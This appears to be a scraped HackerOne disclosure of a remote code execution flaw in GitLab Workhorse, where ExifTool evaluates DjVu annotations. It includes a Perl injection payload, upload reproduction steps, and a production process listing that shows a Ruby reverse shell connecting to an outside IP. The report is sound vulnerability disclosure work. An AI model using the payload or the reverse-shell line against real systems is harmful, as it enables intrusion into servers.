[oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T15:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T15:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T15:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQQOT4NJQF%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T152946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEH8aCXVzLXdlc3QtMiJHMEUCIFPW5VF6Dbc0izuiknH%2B3FgQ3T9ccYasWzwQPPNqzb4kAiEA4LGBITu8a%2Bkud3Fv4T%2Bfc30ViJkgecUKE2%2F7MGU7W%2Bsq%2BgMIGBACGgwwMTM2MTkyNzQ4NDkiDOAp0LGU4hfmIySVZyrXA7v%2BGFDv8TKQ6bwb6WCpnbKyCrArW7jjH%2FbLUWU5SYbKx44Fpndk1PojTx%2FfQJuQ4%2BbdHu2hhK%2F%2F1uCNmX8P0%2FZPcyYd5Th9I5JlEnKuvRy24nRtdQbwOWxVQ%2BfJCrMc5hT%2F3UmZBcBiIy7ylHVgjTG3HmeUClEPBEUgIWYIOZ%2BcwIWE%2BZd6BVDTvRNtcmnmOHsanuiFH2o7UQx6VePQvzyu9KLbd3MxpJJ6F6e45cbu8bQ1bIOyhD4r2vzgx6XM7GR5xEmDOZseREtKV1vJAHSyz8SVMPqIXUKK4zTecrL15wmbc99OlLYdXXAMsxsJC4fNZJSJOKZ2D2ZABbnI0%2FxZlCQhvd93mIXFq%2Bawn5e%2BJJUG46%2BrV3P24CZBygT5M3Hos7qiG01YjUsAN2ouNxdQbi4DqcjXh71wQG%2BT4PMc5YUdsD69fXyXy4bVShL7hTn0V9%2B5OA26JKgejMq%2B4IQJESMiYBjNQxPuGExgb5Cl5oubRD%2FR9%2B%2Fp9%2Fy%2BbR6hoOcA%2Fgvpuj1R6VustK8tFAaoNT%2BCwlS8slfWJmjAuNC1umCewn%2BcBQ7%2FPyOOrR1AKuAM2HWTxlOuKEYI5NPiM1wzB%2B5i%2B3Nb%2BKod2R1bpOI4jcKoiI4UXjDCyv%2BEBjqlAfvePWj%2FMP5TncVM9lUDYSt1EKuPpJEnOHSDbLbjd068wmqyKyjDePlxx3KuLX%2BQC2asfYK1iGafWlEBCaUdJpbjUZJpgucdIJA5yra9B377zKx9bwucii7UTrhaHS7S6Wic1b3jysnsFWQe3sfplhtNs26gmuf8KjVqZCgBiNTBn3vJCJYrOyWHOMGFnzzWFdXYaGJn2bzMoc4zKOaPpjGZUe4iJQ%3D%3D&X-Amz-Signature=f7f48e23327aa682998facdeaded041c9f091eddd424a08722905e89a503b2c3"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T15:29:46", "differentElements": ["h1reporter"], "edition": 20}, {"bulletin": {"id": "H1:1154542", "hash": "884adcfa8831fa9f33a590a635892f21", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER 